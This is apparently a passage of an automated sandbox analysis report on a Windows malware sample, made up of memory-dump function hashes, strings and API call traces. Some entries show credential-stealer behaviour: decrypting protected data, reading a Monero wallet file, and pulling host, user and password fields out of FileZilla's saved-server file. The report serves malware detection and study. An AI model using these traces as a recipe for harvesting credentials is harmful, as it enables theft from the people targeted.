                      • Opcode Fuzzy Hash: e1c80920b61a822c98d93836a90c1ece204e1ff81807283efdbe243fbfaf88a2
                      • Instruction Fuzzy Hash: 5F42E4F260C6009FE304AF29DD8567AFBE5EF94320F16893DE6C487744EA3598448B97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: PF,$dK?$'o|
                      • API String ID: 0-809057215
                      • Opcode ID: a5a66da508000ed30edab9281cbe60442126577738b5e1df2ef60f3c5490d56b
                      • Instruction ID: ca0fc5fca486e03cd59f375dc4c6100fa366ac0b1d5110a3fd970b8a895ace51
                      • Opcode Fuzzy Hash: a5a66da508000ed30edab9281cbe60442126577738b5e1df2ef60f3c5490d56b
                      • Instruction Fuzzy Hash: 5A72F3F390C2009FE304AF29EC8567AFBE5EFD4720F16892DE6C5C7744E63598058A96
                      APIs
                      • CoCreateInstance.COMBASE(003EE118,00000000,00000001,003EE108,00000000), ref: 003E3758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003E37B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: aba067613e6609a2cfae74de553338e01a3f57a4997bbd798d1c2e3477f5a5e1
                      • Instruction ID: 2b8848b76ce4c8a894ed4f1be94efa16e0cbcb74296cb4370cc17e84e3449437
                      • Opcode Fuzzy Hash: aba067613e6609a2cfae74de553338e01a3f57a4997bbd798d1c2e3477f5a5e1
                      • Instruction Fuzzy Hash: AC41D974A40A289FDB24DB54CC99BDBB7B5BB48702F4092D8E608AB2D0D7716E85CF50
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003D9B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 003D9BA3
                      • LocalFree.KERNEL32(?), ref: 003D9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: 7d7bc64edbd56578a410761b5bed1f84096a2f3a62c39831b2e42a119560d007
                      • Instruction ID: 3263c7a0ffa26b4636d2681b20fdfc946045d58a21acf4905eef33b2656c6b86
                      • Opcode Fuzzy Hash: 7d7bc64edbd56578a410761b5bed1f84096a2f3a62c39831b2e42a119560d007
                      • Instruction Fuzzy Hash: D5110CB8A00209DFDB04DFA4D985AAE77B5FF88300F10455AF81597350D770AE10CF61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0$y7$f4_
                      • API String ID: 0-2366434797
                      • Opcode ID: 60ee1baf2cfaca6d97f61cf8225b978ce259cad4282436302bb1e743053324fc
                      • Instruction ID: 9ea682d627e4c1a7cd13641714c7a283bf92fe6453d05ca0f9a12b00d671a165
                      • Opcode Fuzzy Hash: 60ee1baf2cfaca6d97f61cf8225b978ce259cad4282436302bb1e743053324fc
                      • Instruction Fuzzy Hash: 7EB2F7F3A08600AFE7046E2DEC8567ABBE9EF94720F1A493DE6C4C3744E97558418693
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 6m,d$9a_
                      • API String ID: 0-2999063875
                      • Opcode ID: d1ea8642b2c38f8de450252444ab614b271b41d16bbecdb8f445962234e95bfa
                      • Instruction ID: 54fb30cf9597bab45f9e75e01600e71958ae9ad246a2dbf496578cfb6bf466c8
                      • Opcode Fuzzy Hash: d1ea8642b2c38f8de450252444ab614b271b41d16bbecdb8f445962234e95bfa
                      • Instruction Fuzzy Hash: C0820AF3A08204AFE3046E2DED8567AFBEAEFD4720F1A453DE6C4C3744E53598058696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: H7w$o{{
                      • API String ID: 0-1645931659
                      • Opcode ID: edd230085061bdbcd44629192e04ed4a6d9a2e0006f7a25046914d0c739b29e6
                      • Instruction ID: 00de559689512e89e34c0ca60eaadd8db4ee64da8c5f3bd2908c3b26ac32a673
                      • Opcode Fuzzy Hash: edd230085061bdbcd44629192e04ed4a6d9a2e0006f7a25046914d0c739b29e6
                      • Instruction Fuzzy Hash: 4202D1F390C614AFE3046F29EC8167AFBE5EF94720F16892DEAC487744E63558408B97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,\"$sT
                      • API String ID: 0-1071084986
                      • Opcode ID: f9dafe0c42868552738592aa823a22194f4f7a7e72db0b97e4bd9c751f62b560
                      • Instruction ID: 5275cc1d47b81a8c3f2177f7662382553ba869cb51fb122e00d5c92e736e4bac
                      • Opcode Fuzzy Hash: f9dafe0c42868552738592aa823a22194f4f7a7e72db0b97e4bd9c751f62b560
                      • Instruction Fuzzy Hash: C7D149F3A081009FE304AE2DEC8167AB7E6EFD4720F2A853DE6C4C3744E63558058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7?w6
                      • API String ID: 0-3427518209
                      • Opcode ID: e9604add03ac2b7d46f2e5d0d042996ae2762dff12de3131a9de3f24b05bf5a6
                      • Instruction ID: 25496b371e2c6d772d0f591dd38eca7e0ee6ece7f636e3ece59a43afa6beff7f
                      • Opcode Fuzzy Hash: e9604add03ac2b7d46f2e5d0d042996ae2762dff12de3131a9de3f24b05bf5a6
                      • Instruction Fuzzy Hash: EE42E5F3908200AFE7046E2DEC8677ABBE9EF54720F1A492DEAC4D3340E63558148797
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: GKQ
                      • API String ID: 0-2175118331
                      • Opcode ID: 9827ec2c6df446e76836113555c4324fa1f0ca78cc9775b3c173626b38317700
                      • Instruction ID: b3901099bb65c08e8e882245425aec512b1a80e21401164c215fda4b79084bf8
                      • Opcode Fuzzy Hash: 9827ec2c6df446e76836113555c4324fa1f0ca78cc9775b3c173626b38317700
                      • Instruction Fuzzy Hash: 1B51D3B251C218CFDB046E24EC8963ABBE5FFA0318F35892DE6C6C2654D63655C0DB53
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '`s>
                      • API String ID: 0-2433070117
                      • Opcode ID: 1e86b2717a4c65c0d29b9c1563943c41b50103789c9c56f82bb42d625b0d6ad8
                      • Instruction ID: 2a3617b95ea80c34d698288d3af60267dfb866bb48b0a6264228aa6ed44b18c6
                      • Opcode Fuzzy Hash: 1e86b2717a4c65c0d29b9c1563943c41b50103789c9c56f82bb42d625b0d6ad8
                      • Instruction Fuzzy Hash: 615136F3E182149BE3549E19DC1433AB7E6EF94720F1B493DEAC487380E93A5C408786
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: s7Vq
                      • API String ID: 0-2986973187
                      • Opcode ID: d453c8cbb47d247ef7268e65371dc82de3be124f13479eed154e93a0f7be97c9
                      • Instruction ID: 2ac3e8fb77b368cd695cd4ac1812c1596cf5f5b592dec6cbcf7ef07e3fd7899c
                      • Opcode Fuzzy Hash: d453c8cbb47d247ef7268e65371dc82de3be124f13479eed154e93a0f7be97c9
                      • Instruction Fuzzy Hash: 4D414BF3A0C2185FE7086D6EEC4577BBBE8DB80660F1A453EEAC5D7740ED7418018696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EGN
                      • API String ID: 0-2224417284
                      • Opcode ID: bfca637b9f9a2197b6d2c0d89998984fafc3e9869d963a845330445469c15d99
                      • Instruction ID: 63be07d3ced5ea95a1dee8eecd7b84a410cab55797160cf01e34a98f8e331b3d
                      • Opcode Fuzzy Hash: bfca637b9f9a2197b6d2c0d89998984fafc3e9869d963a845330445469c15d99
                      • Instruction Fuzzy Hash: D83100B36086145FE350AE2DDC867AAB7D6EFD8220F1B443DD6C4C7344D93498058686
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a71bc184930fadd3eeae85764901fa26699fc19af67f32913f1b93cc9f64ae2
                      • Instruction ID: 9efd1f2a4732eccdee143a3ac5b586e730cb012b94992c568b9df7bb11cf00d9
                      • Opcode Fuzzy Hash: 5a71bc184930fadd3eeae85764901fa26699fc19af67f32913f1b93cc9f64ae2
                      • Instruction Fuzzy Hash: F851E8B3A085105FF304AA3EDD9876BBBD7EBD5320F26863DDAC4C7784D93548068691
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b301d87dd6b93c0cc85e0335ff6febafbc4f35a418c0f71eeecde916e6e489f
                      • Instruction ID: 51a50e1e3feaa6550e9a3f602a193f242d58b375de4d2facbf107ce1a238d2bb
                      • Opcode Fuzzy Hash: 4b301d87dd6b93c0cc85e0335ff6febafbc4f35a418c0f71eeecde916e6e489f
                      • Instruction Fuzzy Hash: D4515CF3E052105FF348193CDD587BBB686DBD1320F2B833D9A9997BC4E87909054282
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da1d0799685056a6c8789a5a68e206a9e1e219ac501ae16da73e39b26e27918e
                      • Instruction ID: 8effcd0fd3a483c39d0260b6b4de91ba046c026627412bdcfc324bbb38be62ac
                      • Opcode Fuzzy Hash: da1d0799685056a6c8789a5a68e206a9e1e219ac501ae16da73e39b26e27918e
                      • Instruction Fuzzy Hash: 714149F3E082206BE3106D1DDC887A6FBDAEB94760F1B463DDAC497780D5785C0586D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0da88b27d1bd9cf3961658cf5b55d76935fcf8fa62f4e77e1ace8d1b621bdcee
                      • Instruction ID: 156d31dedcc6dba63852255d925a0b6a11c07530664b55bfb6d2a5c69e4e92ac
                      • Opcode Fuzzy Hash: 0da88b27d1bd9cf3961658cf5b55d76935fcf8fa62f4e77e1ace8d1b621bdcee
                      • Instruction Fuzzy Hash: 4451B0B320C60ADFDB047F29D84553AB7E5FF96324F2A492ED2C2C7244EA3445859B47
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,003F0DBA,003F0DB7,003F0DB6,003F0DB3), ref: 003E0362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E0369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 003E0385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 003E03CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E03DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 003E0419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003E0463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003E0562
                      • lstrcat.KERNEL32(?,profile: null), ref: 003E0571
                      • lstrcat.KERNEL32(?,url: ), ref: 003E0580
                      • lstrcat.KERNEL32(?,00000000), ref: 003E0593
                      • lstrcat.KERNEL32(?,003F1678), ref: 003E05A2
                      • lstrcat.KERNEL32(?,00000000), ref: 003E05B5
                      • lstrcat.KERNEL32(?,003F167C), ref: 003E05C4
                      • lstrcat.KERNEL32(?,login: ), ref: 003E05D3
                      • lstrcat.KERNEL32(?,00000000), ref: 003E05E6
                      • lstrcat.KERNEL32(?,003F1688), ref: 003E05F5
                      • lstrcat.KERNEL32(?,password: ), ref: 003E0604
                      • lstrcat.KERNEL32(?,00000000), ref: 003E0617
                      • lstrcat.KERNEL32(?,003F1698), ref: 003E0626
                      • lstrcat.KERNEL32(?,003F169C), ref: 003E0635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: fe0ba998bff6f290d753d436053f76a2baad6e5ccdd373ce82c7c4d1f21cb984
                      • Instruction ID: 1135ea9bb34844d9c777bf31bcd812f8f908d63fcabc6d420d0d0a91bcb7738c
                      • Opcode Fuzzy Hash: fe0ba998bff6f290d753d436053f76a2baad6e5ccdd373ce82c7c4d1f21cb984
                      • Instruction Fuzzy Hash: F1D16F75900258ABCB06EBF5DD96EFE7739AF14300F448619F502AA0D1DF74BA06CB62
